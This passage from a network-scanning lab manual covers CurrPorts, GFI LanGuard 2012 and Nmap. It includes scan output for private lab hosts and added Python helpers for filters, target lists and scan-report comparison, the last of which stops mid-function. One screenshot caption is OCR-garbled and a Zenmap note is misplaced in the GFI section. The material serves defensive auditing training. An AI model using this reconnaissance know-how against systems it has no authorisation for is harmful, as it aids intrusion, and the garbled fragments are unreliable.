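The filter strings noted earlier in this lab follow the syntax [include | exclude]:[local | remote | both | process]:[tcp | udp | tcpudp]:[IPRange | Ports Range]. The following Python program is an added example, not part of the lab manual and not NirSoft's CurrPorts code: it parses filter strings in that syntax and applies them to a constructed snapshot of connection records laid out like the columns of the CurrPorts report, so you can check what a filter will keep before typing it into the Filters dialog. Points the lab does not state and that are assumed here: several filters combine so that a row must match at least one include filter (when any is given) and no exclude filter; both means the local or the remote endpoint; for the process kind, the last field is taken to be a process name such as chrome.exe; the addresses, PIDs and ports in SAMPLE are made up for the example.

```python
import ipaddress
import re
from dataclasses import dataclass

ACTIONS = {"include", "exclude"}
KINDS = {"local", "remote", "both", "process"}
PROTOS = {"tcp", "udp", "tcpudp"}


@dataclass(frozen=True)
class Conn:
    """One row of a CurrPorts-style report (a subset of its columns)."""
    process: str
    pid: int
    proto: str        # "TCP" or "UDP"
    local_addr: str
    local_port: int
    remote_addr: str  # "0.0.0.0" with port 0 for listening sockets
    remote_port: int
    state: str


@dataclass(frozen=True)
class Filter:
    action: str   # include | exclude
    kind: str     # local | remote | both | process
    proto: str    # tcp | udp | tcpudp
    target: str   # IP range, port range, or (assumed) a process name


# Constructed snapshot: addresses, PIDs and ports are made up for this example.
SAMPLE = [
    Conn("chrome.exe", 2988, "TCP", "192.0.2.7", 4119, "198.51.100.26", 80, "Established"),
    Conn("chrome.exe", 2988, "TCP", "192.0.2.7", 4148, "198.51.100.26", 443, "Established"),
    Conn("firefox.exe", 1368, "TCP", "192.0.2.7", 4166, "198.51.100.15", 443, "Established"),
    Conn("svchost.exe", 1000, "UDP", "192.0.2.7", 51234, "192.0.2.1", 53, ""),
    Conn("chrome.exe", 2988, "TCP", "127.0.0.1", 3981, "127.0.0.1", 3982, "Established"),
    Conn("httpd.exe", 1800, "TCP", "0.0.0.0", 80, "0.0.0.0", 0, "Listening"),
    Conn("lsass.exe", 564, "TCP", "0.0.0.0", 1028, "0.0.0.0", 0, "Listening"),
]


def parse_filter(text):
    """Parse one 'action:kind:proto:range' string; keywords are case-insensitive."""
    parts = [p.strip().lower() for p in text.split(":")]
    if len(parts) != 4 or not all(parts):
        raise ValueError(f"filter needs four non-empty colon-separated fields: {text!r}")
    action, kind, proto, target = parts
    if action not in ACTIONS or kind not in KINDS or proto not in PROTOS:
        raise ValueError(f"unknown keyword in filter: {text!r}")
    return Filter(action, kind, proto, target)


def parse_filters(text):
    """Split a Filters-dialog entry on spaces, semicolons or CRLF (as the lab notes) and parse each part."""
    return [parse_filter(p) for p in re.split(r"[\s;]+", text) if p]


def _endpoint_matches(target, addr, port):
    """Digits-only targets are a port or port range; anything else is an IPv4 range (lo-hi or one address)."""
    lo, _, hi = target.partition("-")
    hi = hi or lo
    if target.replace("-", "").isdigit():
        return int(lo) <= port <= int(hi)
    try:
        a, lo_a, hi_a = (ipaddress.ip_address(x) for x in (addr, lo, hi))
    except ValueError:  # unparsable address or range
        return False
    if not (a.version == lo_a.version == hi_a.version):
        return False
    return lo_a <= a <= hi_a


def matches(f, c):
    """Does filter f describe connection c?"""
    if f.proto != "tcpudp" and c.proto.lower() != f.proto:
        return False
    if f.kind == "process":  # assumption: target is a process name
        return c.process.lower() == f.target
    endpoints = []
    if f.kind in ("local", "both"):
        endpoints.append((c.local_addr, c.local_port))
    if f.kind in ("remote", "both"):  # assumption: 'both' means local or remote
        endpoints.append((c.remote_addr, c.remote_port))
    return any(_endpoint_matches(f.target, a, p) for a, p in endpoints)


def apply_filters(filter_text, conns):
    """Keep rows matching at least one include filter (if any) and no exclude filter (assumed semantics)."""
    filters = parse_filters(filter_text)
    includes = [f for f in filters if f.action == "include"]
    excludes = [f for f in filters if f.action == "exclude"]
    kept = []
    for c in conns:
        if includes and not any(matches(f, c) for f in includes):
            continue
        if any(matches(f, c) for f in excludes):
            continue
        kept.append(c)
    return kept


if __name__ == "__main__":
    # Show only outbound HTTPS rows, leaving the Firefox rows out of the view.
    for c in apply_filters("include:remote:tcp:443 exclude:process:tcpudp:firefox.exe", SAMPLE):
        print(f"{c.process:<12} {c.pid:>5} {c.proto} {c.local_addr}:{c.local_port} -> "
              f"{c.remote_addr}:{c.remote_port} {c.state}")
```

Because the target field is taken as a port range whenever it contains only digits and a dash, an IPv4 range must be written with dots (for example 127.0.0.1-127.0.0.255); IPv6 ranges cannot be expressed in a colon-separated filter string at all, so the example only handles IPv4.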
Lab Analysis

Document all the IP addresses, open ports and their running applications, and protocols discovered during the lab.

Note: In the command line, the syntax of the /close command is: /close <Local Address> <Local Port> <Remote Address> <Remote Port>.

Tool/Utility | Information Collected/Objectives Achieved
CurrPorts | Profile Details: Network scan for open ports
 | Scanned Report: ■ Process Name ■ Process ID ■ Protocol ■ Local Port ■ Local Address ■ Remote Port ■ Remote Port Name ■ Remote Address ■ Remote Host Name


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

Note: CurrPorts allows you to easily translate all menus, dialog boxes, and strings to other languages.

1. Analyze the results from CurrPorts by creating a filter string that displays only packets with remote TCP port 80 and UDP port 53 and running it. Analyze and evaluate the output results by creating a filter that displays only the opened ports in the Firefox browser.
2. Determine the use of each of the following options that are available under the Options menu of CurrPorts:
   a. Display Established
   b. Mark Ports Of Unidentified Applications
   c. Display Items Without Remote Address
   d. Display Items With Unknown State

Internet Connection Required
□ Yes ☑ No

Platform Supported
☑ Classroom ☑ iLabs


Lab

Scanning for Network Vulnerabilities Using the GFI LanGuard 2012

GFI LANguard scans networks and ports to detect, assess, and correct any security vulnerabilities that are found.

Lab Scenario

You have learned in the previous lab to monitor TCP/IP and UDP ports on your local computer or network using CurrPorts. This tool will automatically mark with a pink color suspicious TCP/UDP ports owned by unidentified applications. To prevent attacks pertaining to TCP/IP, you can select one or more items, and then close the selected connections. Your company's web server is hosted by a large ISP and is well protected behind a firewall. Your company needs to audit the defenses used by the ISP. After starting a scan, a serious vulnerability was identified but not immediately corrected by the ISP. An evil attacker uses this vulnerability and places a backdoor on the server. Using the backdoor, the attacker gets complete access to the server and is able to manipulate the information on the server. The attacker also uses the server to leapfrog and attack other servers on the ISP network from this compromised one. As a security administrator and penetration tester for your company, you need to conduct penetration testing in order to determine the list of threats and vulnerabilities to the network infrastructure you manage. In this lab, you will be using GFI LanGuard 2012 to scan your network to look for vulnerabilities.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Objectives

The objective of this lab is to help students conduct vulnerability scanning, patch management, and network auditing.

In this lab, you need to:
■ Perform a vulnerability scan


■ Audit the network
■ Detect vulnerable ports
■ Identify security vulnerabilities
■ Correct security vulnerabilities with remedial action

Note: You can download GFI LANguard from http://www.gfi.com.

Lab Environment

To perform the lab, you need:
■ GFI LanGuard located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Vulnerability Scanning Tools\GFI LanGuard
■ You can also download the latest version of GFI LanGuard from the link http://www.gfi.com/lannetscan
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as the host machine
■ Windows Server 2008 running in a virtual machine
■ Microsoft .NET Framework 2.0
■ Administrator privileges to run the GFI LANguard Network Security Scanner
■ It requires the user to register on the GFI website http://www.gfi.com/lannetscan to get a license key
■ Complete the subscription and get an activation code; the user will receive an email that contains an activation code

Note: GFI LANguard works on Microsoft Windows Server 2008 Standard/Enterprise, Windows Server 2003 Standard/Enterprise, Windows 7 Ultimate, Microsoft Small Business Server 2008 Standard, Small Business Server 2003 (SP1), and Small Business Server 2000 (SP2).

Lab Duration

Time: 10 Minutes

Overview of Scanning Network

Security scans or audits enable you to identify and assess possible risks within a network. Auditing operations imply any type of checking performed during a network security audit. These include open port checks, missing Microsoft patches and vulnerabilities, service information, and user or process information.

Note: GFI LANguard includes default configuration settings that allow you to run immediate scans soon after the installation is complete.

As an administrator, you often have to deal separately with problems related to vulnerability issues, patch management, and network auditing. It is your responsibility to address all the vulnerability management needs and act as a virtual consultant to give a complete picture of a network setup, provide risk analysis, and maintain a secure and compliant network state faster and more effectively.


Lab Tasks

Follow the wizard-driven installation steps to install the GFI LANguard network scanner on the host machine, Windows Server 2012.

TASK 1: Scanning for Vulnerabilities

1. Navigate to Windows Server 2012 and launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

Note: The Zenmap installer installs the following files: Nmap Core Files, Nmap Path, WinPcap 4.1.1, Network Interface Import, Zenmap (GUI frontend), Ncat (Modern Netcat), and Ndiff.

[FIGURE 5.1: Windows Server 2012 - Desktop view]

2. Click the GFI LanGuard 2012 app to open the GFI LanGuard 2012 window.

[FIGURE 5.2: Windows Server 2012 - Apps]

3. The GFI LanGuard 2012 main window appears and displays the Network Audit tab contents.

Note: To execute a scan successfully, GFI LANguard must remotely log on to target computers with administrator privileges.

[FIGURE 5.3: The GFI LANguard main window]

Note: The default scanning options which provide quick access to scanning modes are: Quick scan, Full scan, Launch a custom scan, and Set up a scheduled scan.

Note: Custom scans are recommended:
■ When performing a one-time scan with particular scanning parameters/profiles
■ When performing a scan for particular network threats and/or system information
■ To perform a target computer scan using a specific scan profile

4. Click the Launch a Scan option to perform a network scan.

Note: If intrusion detection software (IDS) is running during scans, GFI LANguard sets off a multitude of IDS warnings and intrusion alerts in these applications.

[FIGURE 5.4: The GFI LANguard main window indicating the Launch a Custom Scan option]

5. The Launch a New Scan window will appear:
   i. In the Scan Target option, select localhost from the drop-down list
   ii. In the Profile option, select Full Scan from the drop-down list
   iii. In the Credentials option, select currently logged on user from the drop-down list

6. Click Scan.

M o d u le 0 3 - S c a n n in g N e tw o rk s

GF! LanGuard 2012

’‫ ן ־‬° r x ‫־‬
C o n f!g u ra U o n Jt Urn C J, Uiscuuttm1

• > l«- I
ta u a d ia tn e S a n

D a s h b o a rd

S ca n

Ranrdijle
P10•*: jf-J S^n

A ctiv.tyM o n ito r

R e p o rts

Scar‫־‬a02‫׳‬t: b a te : Ot0en:‫־‬fck»/T«rt(r ockcCon uso‫־‬ Scar Qaccre... Son ■ n d ti Ovrrvlew

v M V

v * ?axrrard: IIZ * 1 1 ‫״‬

SOM R ru lti Dcta ll<

m For largenetw ork environm ents, aM icrosoft SQ LServer/M SD E database backendis recom m endedinsteadof theM icrosoft A ccess database.

FIGURE 5.5: Selecting an option for network scanning

7. Scanning will start; it will take some time to scan the network. See the following figure.

Quick scans have relatively short scan duration times compared to full scans, mainly because quick scans perform vulnerability checks of only a subset of the entire database. It is recommended to run a quick scan at least once a week.

8. After completing the scan, the scan result will show in the left panel.


[Screenshot: the scan dialog after the scan, with Scan Results Overview showing Scan target: localhost, 10.0.0.7 [WIN-D39MR5H19C4] (Windows Server 2012 x64), and the message "Scan completed!" above a summary of the scan results.]
Types of scans:
■ Scan a single computer: Select this option to scan a local host or one specific computer.
■ Scan a range of computers: Select this option to scan a number of computers defined through an IP range.
■ Scan a list of computers: Select this option to import a list of targets from a file or to select targets from a network list.
■ Scan computers in text file: Select this option to scan targets enumerated in a specific text file.
■ Scan a domain or workgroup: Select this option to scan all targets connected to a domain or workgroup.

[Screenshot, continued: the summary pane reports the average vulnerability level for the scan and the results statistics: Audit operations processed: 1,703; Missing software updates: 20 (20 Critical/High); Other vulnerabilities: 13 (13 Critical/High); Potential vulnerabilities: 3. The Scanner Activity Window below it logs the scan threads.]

FIGURE 5.7: The GFI LanGuard Custom scan wizard

9. To check the Scan Result Overview, click the IP address of the machine in the right panel.

10. It shows the Vulnerability Assessment and Network & Software Audit nodes; click Vulnerability Assessment.

[Screenshot: Scan Results Details for localhost, 10.0.0.7 [WIN-D39MR5H19C4] (Windows Server 2012 x64), with the Vulnerability Assessment and Network & Software Audit nodes. The Vulnerability level pane reports that the computer does not have a vulnerability level yet and lists the possible reasons: the credentials used to scan this computer do not allow the security scanner to retrieve all information required to estimate the vulnerability level (an account with administrative privileges on the target computer is required); certain security settings on the remote computer block the access of the security scanner; the scan is not finished yet; detection of missing patches and vulnerabilities is turned off in the scanning profile used to perform the scan.]
FIG U R E5 .8 :S electin gV ulnerabilityA ssessm ent option


11. It shows all the Vulnerability Assessment indicators by category.

GFI LANguard scans target computers to retrieve setup information and identify all security vulnerabilities, including:
■ Missing Microsoft updates
■ System software information, including unauthorized applications, incorrect antivirus settings and outdated signatures
■ System hardware information, including connected modems and USB devices

During a full scan,

[Screenshot: Vulnerability Assessment categories for 10.0.0.7: High Security Vulnerabilities (3), Medium Security Vulnerabilities (6), Low Security Vulnerabilities (4), Potential Vulnerabilities (3), Missing Service Packs and Update Rollups (1) and Missing Security Updates (3); each entry allows you to analyze the vulnerabilities of that severity. Below them sits the Network & Software Audit node.]

FIGURE 5.9: List of Vulnerability Assessment categories

12. Click Network & Software Audit in the right panel, and then click System Patching Status, which shows all the system patching statuses.
[Screenshot: GFI LanGuard 2012 with Network & Software Audit > System Patching Status selected for 10.0.0.7 [WIN-D39MR5H19C4]; the pane asks you to select one of the following system patching statuses.]

Due to the large amount of information retrieved from scanned targets, full scans often tend to be lengthy. It is recommended to run a full scan at least once every 2 weeks.

[Screenshot, continued: System Patching Status entries for the host: Missing Service Packs and Update Rollups (1), Missing Security Updates (3), Missing Non-Security Updates (16), Installed Non-Security Updates (1) and Installed Security Updates (2); further nodes for Ports, Hardware, Software and System Information. The Scanner Activity Window reports "Starting security scan of host [WIN-D39MR5H19C4] (10.0.0.7)".]

FIGURE 5.10: System patching status report

13. Click Ports, and under this, click Open TCP Ports.


A custom scan is a network audit based on parameters which you configure on the fly before launching the scanning process. Various parameters can be customized during this type of scan, including:
■ Type of scanning profile (i.e., the type of checks to execute/type of data to retrieve)
■ Scan targets
■ Logon credentials

[Screenshot: Open TCP Ports for 10.0.0.7 [WIN-D39MR5H19C4], each entry giving the port number, a description and the service detected, for example 80 (Hypertext Transfer Protocol, http), 135 (DCE endpoint resolution), 139 (NetBIOS Session Service), 445 (Microsoft-DS), 1433 (Microsoft SQL Server database) and 3389; an Open UDP Ports (5) node follows, together with the Hardware, Software and System Information nodes.]

FIGURE 5.11: TCP/UDP Ports result

14. Click System Information in the right side panel; it shows all the details of the system information.

15. Click Password Policy.
[Screenshot: GFI LanGuard 2012 with the System Information node expanded under Scan Results Details for localhost.]
The next job after a network security scan is to identify which areas and systems require your immediate attention. Do this by analyzing and correctly interpreting the information collected and generated during a network security scan.

[Screenshot, continued: Password Policy entries (minimum password length, maximum password age: 42 days, password history: no history) followed by the other System Information nodes: Security Audit Policy (Off), Registry, NetBIOS Names (3), Computer, Groups (28), Users (4), Logged On Users, Sessions (2), Services (148), Processes (76) and Remote TOD (Time Of Day).]

FIGURE 5.12: Information of Password Policy

16. Click Groups: it shows all the groups present in the system.


A high vulnerability level is the result of vulnerabilities or missing patches whose average severity is categorized as high.

A scheduled scan is a network audit scheduled to run automatically on a specific date/time and at a specific frequency. Scheduled scans can be set to execute once or periodically.
[Screenshot: System Information > Groups (28) for the scanned host, listing local groups such as Administrators, Distributed COM Users, Event Log Readers, Guests, IIS_IUSRS, Network Configuration Operators, Performance Log Users, Print Operators, RDS Endpoint Servers, RDS Management Servers and Users, among others.]

FIGURE 5.13: Information of Groups

17. Click the Dashboard tab: it shows all the scanned network information.
[Screenshot: GFI LanGuard 2012 Dashboard tab showing Entire Network - 1 computer and the Security Sensors panel.]
It is recommended to use scheduled scans:
■ To perform periodical/regular network vulnerability scans automatically and using the same scanning profiles and parameters
■ To trigger scans automatically after office hours and to generate alerts and auto-distribution of scan results via email
■ To automatically trigger auto-remediation options (e.g., auto download and deploy missing updates)
[Screenshot, continued: Dashboard panels for Vulnerability Level, Most Vulnerable Computers, Agent Status, Vulnerability Trend Over Time, Computer Vulnerability Distribution, Computers by Operating System, Malware Protection and Agent Health Issues.]
FIGURE 5.14: Scanned report of the network

Lab Analysis

Document all the results, threats, and vulnerabilities discovered during the scanning and auditing process.


Tool/Utility: GFI LanGuard 2012

Information Collected/Objectives Achieved:
■ Vulnerability Level
■ Vulnerable Assessment
■ System Patching Status
■ Scan Results Details for Open TCP Ports
■ Scan Results Details for Password Policy
■ Dashboard - Entire Network: Vulnerability Level, Security Sensors, Most Vulnerable Computers, Agent Status, Vulnerability Trend Over Time, Computer Vulnerability Distribution, Computers by Operating System

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Analyze how GFI LANguard products provide protection against a worm.
2. Evaluate under what circumstances GFI LANguard displays a dialog during patch deployment.
3. Can you change the message displayed when GFI LANguard is performing administrative tasks? If yes, how?

Internet Connection Required: ☐ Yes ☑ No

Platform Supported: ☑ Classroom ☑ iLabs


Exploring and Auditing a Network Using Nmap

Nmap (Zenmap is the official Nmap GUI) is a free, open source (license) utility for network exploration and security auditing.

ICON KEY: Valuable information, Test your knowledge, Web exercise, Workbook review

Lab Scenario

In the previous lab you learned to use GFI LanGuard 2012 to scan a network to find out the vulnerability level, system patching status, details for open and closed ports, vulnerable computers, etc. An administrator and an attacker can use the same tools to fix or exploit a system. If an attacker gets to know all the information about vulnerable computers, they will immediately act to compromise those systems using reconnaissance techniques. Therefore, as an administrator it is very important for you to patch those systems after you have determined all the vulnerabilities in a network, before the attacker audits the network to gain vulnerable information. Also, as an ethical hacker and network administrator for your company, your job is to carry out daily security tasks, such as network inventory, service upgrade schedules, and the monitoring of host or service uptime. So, you will be guided in this lab to use Nmap to explore and audit a network.
Lab Objectives

The objective of this lab is to help students learn and understand how to perform a network inventory, manage services and upgrades, schedule network tasks, and monitor host or service uptime and downtime. In this lab, you need to:
■ Scan TCP and UDP ports
■ Analyze host details and their topology
■ Determine the types of packet filters
■ Record and save all scan reports
■ Compare saved results for suspicious ports

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
Lab Environment

To perform the lab, you need:
■ Nmap located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\Nmap
■ You can also download the latest version of Nmap from the link http://nmap.org/
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as a host machine
■ Windows Server 2008 running on a virtual machine as a guest
■ A web browser with Internet access
■ Administrative privileges to run the Nmap tool

Zenmap works on Windows, including Windows 7 and Server 2003/2008.
Lab Duration

Time: 20 Minutes

Overview of Network Scanning

Network addresses are scanned to determine:
■ What services (application names and versions) those hosts offer
■ What operating systems (and OS versions) they run
■ The type of packet filters/firewalls that are in use and dozens of other characteristics

Lab Tasks

TASK 1: Intense Scan

Follow the wizard-driven installation steps and install the Nmap (Zenmap) scanner on the host machine (Windows Server 2012).

1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

FIGURE 6.1: Windows Server 2012 Desktop view

2. Click the Nmap-Zenmap GUI app to open the Zenmap window.

Zenmap installs the following files:
■ Nmap Core Files
■ Nmap Path
■ WinPcap 4.1.1
■ Network Interface Import
■ Zenmap (GUI frontend)
■ Ncat (Modern Netcat)
■ Ndiff

[Screenshot: Windows Server 2012 Start/Apps screen for the Administrator account, showing the Nmap - Zenmap GUI tile among Server Manager, Windows PowerShell, Control Panel, Hyper-V Manager, Command Prompt and other apps.]

FIGURE 6.2: Windows Server 2012 - Apps

3. The Nmap - Zenmap GUI window appears.

Nmap Syntax: nmap [Scan Type(s)] [Options] {target specification}

In port scan techniques, only one method may be used at a time, except that UDP scan (-sU) and any one of the SCTP scan types (-sY, -sZ) may be combined with any one of the TCP scan types.
FIGURE 6.3: The Zenmap main window

4. Enter the virtual machine Windows Server 2008 IP address (10.0.0.4) in the Target: text field. You are performing a network inventory for the virtual machine.

5. In this lab, the IP address would be 10.0.0.4; it will be different from your lab environment.

6. In the Profile: text field, select, from the drop-down list, the type of profile you want to scan. In this lab, select Intense Scan.


7. Click Scan to start scanning the virtual machine.

[Screenshot: Zenmap with Target 10.0.0.4, Profile Intense scan and Command nmap -T4 -A -v 10.0.0.4; the Nmap Output, Ports / Hosts, Topology, Host Details and Scans tabs are empty before the scan.]

While Nmap attempts to produce accurate results, keep in mind that all of its insights are based on packets returned by the target machines or the firewalls in front of them.

FIGURE 6.4: The Zenmap main window with Target and Profile entered

The six port states recognized by Nmap:
■ Open
■ Closed
■ Filtered
■ Unfiltered
■ Open|Filtered
■ Closed|Unfiltered
8. Nmap scans the provided IP address with Intense scan and displays the scan result below the Nmap Output tab.

[Screenshot: Zenmap with Target 10.0.0.4, Command nmap -T4 -A -v 10.0.0.4 and the Nmap Output tab selected. The output reads:]

Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-24
NSE: Loaded 93 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 15:35
Scanning 10.0.0.4 [1 port]
Completed ARP Ping Scan at 15:35, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:35
Completed Parallel DNS resolution of 1 host. at 15:35, 0.50s elapsed
Initiating SYN Stealth Scan at 15:35
Scanning 10.0.0.4 [1000 ports]
Discovered open port 135/tcp on 10.0.0.4
Discovered open port 139/tcp on 10.0.0.4
Discovered open port 445/tcp on 10.0.0.4
Increasing send delay for 10.0.0.4 from 0 to 5 due to 72 out of 179 dropped probes since last increase.
Discovered open port 49152/tcp on 10.0.0.4
Discovered open port 49154/tcp on 10.0.0.4
Discovered open port 49153/tcp on 10.0.0.4
Discovered open port 49156/tcp on 10.0.0.4
Discovered open port 49155/tcp on 10.0.0.4
Discovered open port 5357/tcp on 10.0.0.4

Nmap accepts multiple host specifications on the command line, and they don't need to be of the same type.

FIGURE 6.5: The Zenmap main window with the Nmap Output tab for Intense Scan

9. After the scan is complete, Nmap shows the scanned results.

[Screenshot: Zenmap Nmap Output tab after the intense scan of 10.0.0.4. The visible part of the output reads:]

139/tcp   open  netbios-ssn
445/tcp   open  netbios-ssn
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-methods: No Allow or Public header in OPTIONS response (status code 503)
|_http-title: Service Unavailable
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:15:5D:00:07:10 (Microsoft)
Device type: general purpose
Running: Microsoft Windows 7|2008
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008::sp1
OS details: Microsoft Windows 7 or Windows Server 2008 SP1
Uptime guess: 0.256 days (since Fri Aug 24 09:27:40 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

The options available to control target selection:
■ -iL <inputfilename>
■ -iR <num hosts>
■ --exclude <host1>[,<host2>[,...]]
■ --excludefile <exclude_file>

The following options control host discovery:
■ -sL (List Scan)
■ -sn (No port scan)
■ -Pn (No ping)
■ -PS<port list> (TCP SYN Ping)
■ -PA<port list> (TCP ACK Ping)
■ -PU<port list> (UDP Ping)
■ -PY<port list> (SCTP INIT Ping)
■ -PE; -PP; -PM (ICMP Ping Types)
■ -PO<protocol list> (IP Protocol Ping)
■ -PR (ARP Ping)
■ --traceroute (Trace path to host)
■ -n (No DNS resolution)
■ -R (DNS resolution for all targets)
■ --system-dns (Use system DNS resolver)
■ --dns-servers <server1>[,<server2>[,...]] (Servers to use for reverse DNS queries)
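Both scanners in this module take their targets the same way: a single host, an IP range, a CIDR block, a list read from a file, or everything minus an exclusion list (the GFI LanGuard "Types of scans" note and the Nmap -iL / --exclude options above). The following Python is an added example, not code from the lab manual, from GFI or from Nmap: it expands such specifications into an explicit host list so the scope of a scan can be reviewed (and the scanner itself, the lab's 10.0.0.7 host, excluded) before anything is launched. The sample list file and the addresses in it are constructed for this example.

```python
"""Expand scan-target specifications into an explicit, reviewable host list.

Added example (not from the lab manual, GFI LanGuard or Nmap): it mirrors the
target-selection styles the lab lists (a single host, an IP range, a CIDR
block, a list read from a file, and an exclusion list) so that the scope of a
scan can be checked before it is launched.
"""
import ipaddress
from typing import Iterable, List, Set

# Constructed sample of an input-list file (one spec per line, '#' comments).
SAMPLE_LIST_FILE = """\
# lab hosts (constructed sample)
10.0.0.4          # Windows Server 2008 guest
10.0.0.7          # Windows Server 2012 host
10.0.0.16-19      # short range form: only the last octet varies
"""


def _expand_one(spec: str) -> Set[ipaddress.IPv4Address]:
    """Turn one spec (host, CIDR block, or range) into a set of addresses."""
    spec = spec.strip()
    if "/" in spec:                                  # CIDR block, e.g. 10.0.0.0/29
        net = ipaddress.ip_network(spec, strict=False)
        # Skip network/broadcast addresses for real subnets; /31 and /32 have none.
        return set(net.hosts()) if net.num_addresses > 2 else set(net)
    if "-" in spec:                                  # range: 10.0.0.4-10.0.0.7 or 10.0.0.4-7
        lo, hi = spec.split("-", 1)
        if "." not in hi:                            # short form: reuse the first three octets
            hi = ".".join(lo.split(".")[:3] + [hi])
        start, end = ipaddress.ip_address(lo), ipaddress.ip_address(hi)
        if end < start:
            raise ValueError(f"range end precedes start: {spec}")
        return {ipaddress.ip_address(n) for n in range(int(start), int(end) + 1)}
    return {ipaddress.ip_address(spec)}              # single host


def load_target_file(text: str) -> List[str]:
    """Parse the text of a list file (-iL / 'scan a list of computers' style)."""
    specs = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()         # drop comments and blanks
        if line:
            specs.append(line)
    return specs


def expand_targets(specs: Iterable[str], exclude: Iterable[str] = ()) -> List[str]:
    """Return the sorted addresses covered by specs, minus those in exclude."""
    wanted: Set[ipaddress.IPv4Address] = set()
    for s in specs:
        wanted |= _expand_one(s)
    excluded: Set[ipaddress.IPv4Address] = set()
    for s in exclude:
        excluded |= _expand_one(s)
    return [str(a) for a in sorted(wanted - excluded)]


if __name__ == "__main__":
    # Scope the lab's /29 but leave out the scanning host itself, then show the file form.
    print(expand_targets(["10.0.0.0/29"], exclude=["10.0.0.7"]))
    print(expand_targets(load_target_file(SAMPLE_LIST_FILE)))
```

The expanded list is what should go into the change record for the scan; a reviewer can then compare it against the agreed scope instead of reading a CIDR or a range by eye.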

FIGURE 6.6: The Zenmap main window with the Nmap Output tab for Intense Scan

10. Click the Ports / Hosts tab to display more information on the scan results.

11. Nmap also displays the Port, Protocol, State, Service, and Version of the scan.

[Screenshot: Zenmap Ports / Hosts tab for 10.0.0.4:]

Port   Protocol  State  Service      Version
135    tcp       open   msrpc        Microsoft Windows RPC
139    tcp       open   netbios-ssn
445    tcp       open   netbios-ssn
5357   tcp       open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152  tcp       open   msrpc        Microsoft Windows RPC
49153  tcp       open   msrpc        Microsoft Windows RPC
49154  tcp       open   msrpc        Microsoft Windows RPC
49155  tcp       open   msrpc        Microsoft Windows RPC
49156  tcp       open   msrpc        Microsoft Windows RPC

FIGURE 6.7: The Zenmap main window with the Ports / Hosts tab for Intense Scan
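Two of the lab objectives are to record and save all scan reports and to compare saved results for suspicious ports. Nmap can write the table shown in the Ports / Hosts tab to XML with -oX, and that format is what makes the comparison mechanical. The Python below is an added example, not code from the lab manual or from Nmap (Nmap ships its own Ndiff tool, listed among the installed files above, for the same job): it parses two saved reports and lists the ports that have newly opened or stopped being open on each host. Both XML documents are constructed for this example; the baseline mirrors the lab's scan of 10.0.0.4 and the "current" report adds one port and drops another.

```python
"""Parse saved Nmap XML reports and compare two of them for changed open ports.

Added example, not from the lab manual or from Nmap itself. The two reports
below are constructed: BASELINE_XML mirrors what 'nmap -T4 -A -v -oX
baseline.xml 10.0.0.4' would record for the lab's intense scan, and
CURRENT_XML is a later, constructed scan in which one port has appeared and
one has disappeared.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

PortKey = Tuple[str, int]                    # (protocol, port number)
PortInfo = Tuple[str, str, str]              # (state, service name, product/version)
HostPorts = Dict[PortKey, PortInfo]

BASELINE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -T4 -A -v -oX baseline.xml 10.0.0.4" start="1345807500">
<host><status state="up" reason="arp-response"/>
<address addr="10.0.0.4" addrtype="ipv4"/>
<address addr="00:15:5D:00:07:10" addrtype="mac" vendor="Microsoft"/>
<ports><extraports state="closed" count="996"/>
<port protocol="tcp" portid="135"><state state="open" reason="syn-ack"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
<port protocol="tcp" portid="139"><state state="open" reason="syn-ack"/><service name="netbios-ssn"/></port>
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/><service name="netbios-ssn"/></port>
<port protocol="tcp" portid="5357"><state state="open" reason="syn-ack"/><service name="http" product="Microsoft HTTPAPI httpd" version="2.0"/></port>
</ports></host></nmaprun>
"""

CURRENT_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -T4 -A -v -oX current.xml 10.0.0.4" start="1346412300">
<host><status state="up" reason="arp-response"/>
<address addr="10.0.0.4" addrtype="ipv4"/>
<address addr="00:15:5D:00:07:10" addrtype="mac" vendor="Microsoft"/>
<ports><extraports state="closed" count="996"/>
<port protocol="tcp" portid="135"><state state="open" reason="syn-ack"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
<port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/><service name="netbios-ssn"/></port>
<port protocol="tcp" portid="3389"><state state="open" reason="syn-ack"/><service name="ms-wbt-server" product="Microsoft Terminal Service"/></port>
<port protocol="tcp" portid="5357"><state state="open" reason="syn-ack"/><service name="http" product="Microsoft HTTPAPI httpd" version="2.0"/></port>
</ports></host></nmaprun>
"""


def parse_nmap_xml(xml_text: str) -> Dict[str, HostPorts]:
    """Map each scanned IP to its per-port (state, service, product) entries."""
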